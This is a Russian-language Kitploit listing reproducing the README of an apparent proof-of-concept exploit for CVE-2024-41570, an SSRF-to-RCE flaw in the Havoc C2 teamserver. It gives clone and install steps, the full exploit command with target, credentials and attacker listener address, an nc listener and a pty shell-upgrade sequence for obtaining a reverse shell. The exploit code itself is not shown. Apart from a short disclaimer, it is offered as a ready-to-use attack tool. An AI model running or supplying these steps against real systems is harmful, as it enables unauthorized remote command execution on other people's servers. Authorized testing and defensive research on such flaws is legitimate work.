Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-41570 — Автоматизированный эксплойт Reverse Shell через WebSocket | Havoc-C2-SSRF с RCE | Kitploit
Инструменты/GitHubGitHub/diemoeve/cve-2024-41570
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Автоматизированный эксплойт Reverse Shell через WebSocket | Havoc-C2-SSRF с RCE

Репозиторий
122141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-41570 | Havoc C2 SSRF с RCE | Автоматизированный эксплойт Reverse Shell через WebSocket

Этот проект содержит proof-of-concept (PoC) скрипт на Python для эксплуатации уязвимого сервиса на основе WebSocket. Скрипт автоматизирует регистрацию агента, доставку WebSocket-пейлоада и удалённое выполнение команд для установления обратной оболочки (reverse shell).

Возможности

  • Регистрирует агента в целевом сервисе.
  • Открывает WebSocket и отправляет пейлоады рукопожатия (handshake) и аутентификации.
  • Выполняет команды удалённо через обратную оболочку (reverse shell).
  • Предоставляет пошаговый процесс с понятными инструкциями.

Предварительные требования

  • Python 3.x, установленный на вашей машине.
  • Установите необходимые зависимости, выполнив:
    root@kitploit:~
    pip install -r requirements.txt
    

Установка

  1. Клонируйте этот репозиторий:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  • Перейдите в каталог проекта:
    root@kitploit:~
    cd CVE-2024-41570
    
  • Установите зависимости:
    root@kitploit:~
    pip install -r requirements.txt
    
  • Использование

    Запустите скрипт с необходимыми аргументами:

    root@kitploit:~
    python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
    

    Аргументы

    • -t: Целевой URL WebSocket-сервера.
    • -i: IP-адрес Team Server из Havoc.
    • -p: Порт Team Server из Havoc.
    • -U: Имя пользователя для аутентификации WebSocket.
    • -P: Пароль для аутентификации WebSocket.
    • -l: IP-адрес слушателя (listener) для обратной оболочки (ваша машина).
    • -L: Порт слушателя (listener) для обратной оболочки (ваша машина).

    Пример команды

    root@kitploit:~
    python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
    

    Шаги выполнения

    1. Убедитесь, что целевой сервис запущен и уязвим.
    2. Запустите скрипт с необходимыми параметрами.
    3. В отдельном терминале запустите слушатель (listener):
      root@kitploit:~
      nc -lvnp <listener_port>
      
    4. Улучшите оболочку (upgrade shell):
      root@kitploit:~
      python -c 'import pty; pty.spawn("/bin/bash")' 
      export TERM=xterm-256color
      stty rows 67 columns 318
      

    Зависимости

    Скрипт требует следующие библиотеки Python:

    • requests
    • pycryptodome

    Установите их с помощью команды:

    root@kitploit:~
    pip install -r requirements.txt
    

    Уведомление о безопасности

    Этот скрипт предназначен только для образовательных целей. Убедитесь, что у вас есть явное разрешение на тестирование целевой системы. Неправильное использование этого скрипта может нарушить законы и этические нормы.

    Ссылки

    Вдохновлено Default Havoc Poc

    Вклад в проект

    Вклад приветствуется! Не стесняйтесь форкать репозиторий и отправлять pull request.

    Лицензия

    Этот проект распространяется под лицензией MIT. Подробности см. в файле LICENSE.

    Скачать инструмент